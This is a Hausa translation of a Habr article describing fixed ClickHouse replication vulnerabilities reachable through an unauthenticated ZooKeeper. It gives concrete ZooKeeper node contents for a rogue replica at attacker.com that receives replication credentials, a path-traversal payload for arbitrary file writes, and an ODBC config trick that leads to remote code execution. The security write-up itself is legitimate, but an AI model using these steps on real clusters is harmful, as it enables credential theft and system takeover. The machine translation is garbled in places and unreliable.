Wannan labarin zai ba da labarin ƙayyadaddun rauni a cikin ka'idar kwafin ClickHouse, kuma zai nuna yadda za a iya faɗaɗa saman harin.
ClickHouse shine ma'ajin bayanai don adana manyan bayanai, galibi ana amfani da kwafi fiye da ɗaya. Tari da maimaitawa a ClickHouse an gina su akan sama (ZK) kuma yana buƙatar haƙƙin rubutawa.
Tsohuwar shigarwa na ZK baya buƙatar tabbatarwa, don haka dubban sabar ZK da aka yi amfani da su don saita Kafka, Hadoop, ClickHouse suna samuwa a bainar jama'a.
Don rage saman harin ku, yakamata koyaushe ku tsara ingantaccen aiki da izini lokacin shigar da ZooKeeper
Tabbas akwai wasu 0day tushen tushen Java, amma tunanin cewa maharin zai iya karantawa da rubutawa zuwa ZooKeeper, wanda aka yi amfani da shi don maimaita ClickHouse.
Lokacin da aka saita cikin yanayin tari, ClickHouse yana goyan bayan tambayoyin da aka rarraba , wucewa ta hanyar ZK - don su an halicci nodes a cikin takardar /clickhouse/task_queue/ddl.
Misali, kuna ƙirƙirar kumburi /clickhouse/task_queue/ddl/query-0001 tare da abun ciki:
version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']kuma bayan haka, za a share teburin gwajin akan uwar garken cluster host1 da host2. DDL kuma yana goyan bayan gudanar da tambayoyin CREATE/ALTER/DROP.
Sauti mai ban tsoro? Amma a ina maharin zai iya samun adiresoshin uwar garken?
yana aiki a matakin tebur guda ɗaya, ta yadda lokacin da aka ƙirƙiri tebur a cikin ZK, an ƙayyade uwar garken da zai ɗauki alhakin musayar metadata tare da kwafi. Misali, lokacin aiwatar da buƙatu (dole ne a daidaita ZK, chXX - sunan kwafi, foobar - sunan tebur):
CREATE TABLE foobar
(
`action_id` UInt32 DEFAULT toUInt32(0),
`status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;za a ƙirƙira nodes ginshikan и metadata.
Abun ciki /clickhouse/tables/01/foobar/replicas/chXX/hosts:
host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: httpShin zai yiwu a haɗa bayanai daga wannan tari? Ee, idan tashar kwafi (TCP/9009) a kan uwar garke chXX-address Ba za a rufe Tacewar zaɓi ba kuma ba za a daidaita ingantaccen aiki ba. Yadda za a ketare tantancewa?
Mai hari zai iya ƙirƙirar sabon kwafi a cikin ZK ta hanyar kwafin abubuwan da ke ciki kawai /clickhouse/tables/01-01/foobar/replicas/chXX da canza ma'anar host.
Abun ciki /clickhouse/tables/01-01/foobar/replicas/attacker/host:
host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: httpSannan kuna buƙatar gaya wa sauran kwafin cewa akwai sabon toshe bayanai akan uwar garken maharin da suke buƙatar ɗauka - an ƙirƙiri kumburi a cikin ZK. /clickhouse/tables/01-01/foobar/log/log-00000000XX (XX mai girma na monotonically, wanda ya kamata ya fi na ƙarshe a cikin tarihin taron):
format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2inda source_replica - sunan kwafin maharin da aka ƙirƙira a matakin baya, block_id - mai gano block data, sa - "samun toshe" umarni (kuma ).
Bayan haka, kowane kwafi yana karanta wani sabon abu a cikin log ɗin kuma ya tafi zuwa uwar garken da maharin ke sarrafa don karɓar toshe bayanai (ka'idar kwafi ita ce binary, tana gudana a saman HTTP). Sabar attacker.com za a karɓi buƙatun:
POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXXinda XXX shine bayanan tabbatarwa don kwafi. A wasu lokuta, wannan na iya zama asusu tare da samun dama ga ma'ajin bayanai ta hanyar babban ka'idar ClickHouse da ka'idar HTTP. Kamar yadda kuka gani, saman harin ya zama babba saboda ZooKeeper, wanda aka yi amfani da shi don maimaitawa, an bar shi ba tare da an saita ingantacciyar ba.
Bari mu dubi aikin samun toshe bayanai daga kwafi, an rubuta shi tare da cikakken tabbaci cewa duk kwafin suna ƙarƙashin kulawa mai kyau kuma akwai amana a tsakanin su.
lambar sarrafa kwafi
Aikin yana karanta jerin fayiloli, sannan sunayensu, girmansu, abinda ke ciki, sannan ya rubuta su zuwa tsarin fayil. Yana da daraja daban-daban kwatanta yadda ake adana bayanai a cikin tsarin fayil.
Akwai subdirectories da yawa a ciki /var/lib/clickhouse (Tsoffin littafin ajiya daga fayil ɗin sanyi):
flags - directory don yin rikodi , da ake amfani dashi a farfadowa bayan asarar bayanai;
tmp - kundin adireshi don adana fayilolin wucin gadi;
user_files - ayyuka tare da fayiloli a cikin buƙatun suna iyakance ga wannan jagorar (INTO OUTFILE da sauransu);
metadata - sql fayiloli tare da bayanin tebur;
preprocessed_configs - fayilolin sanyi da aka sarrafa daga /etc/clickhouse-server;
data - ainihin kundin adireshi tare da bayanan kanta, a cikin wannan yanayin don kowane bayanan bayanai an ƙirƙiri wani yanki na daban kawai anan (misali. /var/lib/clickhouse/data/default).
Ga kowane tebur, an ƙirƙiri ƙaramin kundin adireshi a cikin kundin bayanai. Kowane ginshiƙi keɓaɓɓen fayil ne dangane da . Misali ga tebur foobarmaharin ya ƙirƙira, za a ƙirƙiri fayiloli masu zuwa:
action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2Kwafin yana tsammanin karɓar fayiloli tare da sunaye iri ɗaya lokacin sarrafa toshe bayanai kuma baya inganta su ta kowace hanya.
Wataƙila mai karatu mai hankali ya riga ya ji labarin rashin lafiyar haɗa fayil_name a cikin wani aiki WriteBufferFromFile. Ee, wannan yana bawa maharin damar rubuta abun ciki na sabani zuwa kowane fayil akan FS tare da haƙƙin mai amfani clickhouse. Don yin wannan, kwafin da maharin ke sarrafawa dole ne ya dawo da amsa mai zuwa ga buƙatar (an ƙara hutun layi don sauƙin fahimta):
x01
x00x00x00x00x00x00x00x24
../../../../../../../../../tmp/pwned
x12x00x00x00x00x00x00x00
hellofromzookeeperda kuma bayan concatenation ../../../../../../../../../tmp/pwned za a rubuta fayil ɗin /tmp/pwn tare da abun ciki hellofromzookeeper.
Akwai zaɓuɓɓuka da yawa don juya ikon rubutun fayil zuwa aiwatar da lambar nesa (RCE).
Kamus na waje a cikin RCE
A cikin tsofaffin nau'ikan, kundin adireshi tare da saitunan ClickHouse an adana shi tare da haƙƙin mai amfani danna gidan tsoho. Fayilolin saituna fayilolin XML ne waɗanda sabis ɗin ke karantawa a farawa sannan kuma ya adana su /var/lib/clickhouse/preprocessed_configs. Lokacin da canje-canje suka faru, ana sake karanta su. Idan kuna da damar zuwa /etc/clickhouse-server mai kai hari zai iya ƙirƙirar nasa nau'in aiwatarwa sannan aiwatar da code na sabani. Sigar ClickHouse na yanzu ba sa samar da haƙƙi ta tsohuwa, amma idan an sabunta sabar a hankali, irin waɗannan haƙƙoƙin na iya kasancewa. Idan kuna tallafawa gungu na ClickHouse, duba haƙƙoƙin tsarin saituna, dole ne ya kasance na mai amfani. root.
ODBC zuwa RCE
Lokacin shigar da fakiti, an ƙirƙiri mai amfani clickhouse, amma ba a ƙirƙiri littafin tarihin gida ba /nonexistent. Koyaya, lokacin amfani da ƙamus na waje, ko don wasu dalilai, masu gudanarwa suna ƙirƙirar kundin adireshi /nonexistent kuma ba mai amfani clickhouse samun damar rubuta shi (SSZB! kusan mai fassara).
ClickHouse yana goyan bayan kuma zai iya haɗawa da sauran bayanan bayanai. A cikin ODBC, zaku iya tantance hanyar zuwa ɗakin karatu na direban bayanai (.so). Tsofaffin nau'ikan ClickHouse sun ba ku damar yin hakan kai tsaye a cikin mai kula da buƙatun, amma yanzu an ƙara ƙarin bincika igiyoyin haɗin kai zuwa odbc-bridge, don haka ba zai yiwu a tantance hanyar direba daga buƙatar ba. Amma mai iya kai hari zai iya rubutawa zuwa kundin adireshin gida ta amfani da raunin da aka kwatanta a sama?
Bari mu ƙirƙiri fayil ~/.odbc.ini da abun ciki kamar haka:
[lalala]
Driver=/var/lib/clickhouse/user_files/test.sosannan a fara aiki SELECT * FROM odbc('DSN=lalala', 'test', 'test'); za a loda ɗakin karatu test.so kuma ya karɓi RCE (na gode don tip).
Waɗannan da sauran lahani an gyara su a cikin ClickHouse version 19.14.3. Kula da ClickHouse da ZooKeepers!
source: www.habr.com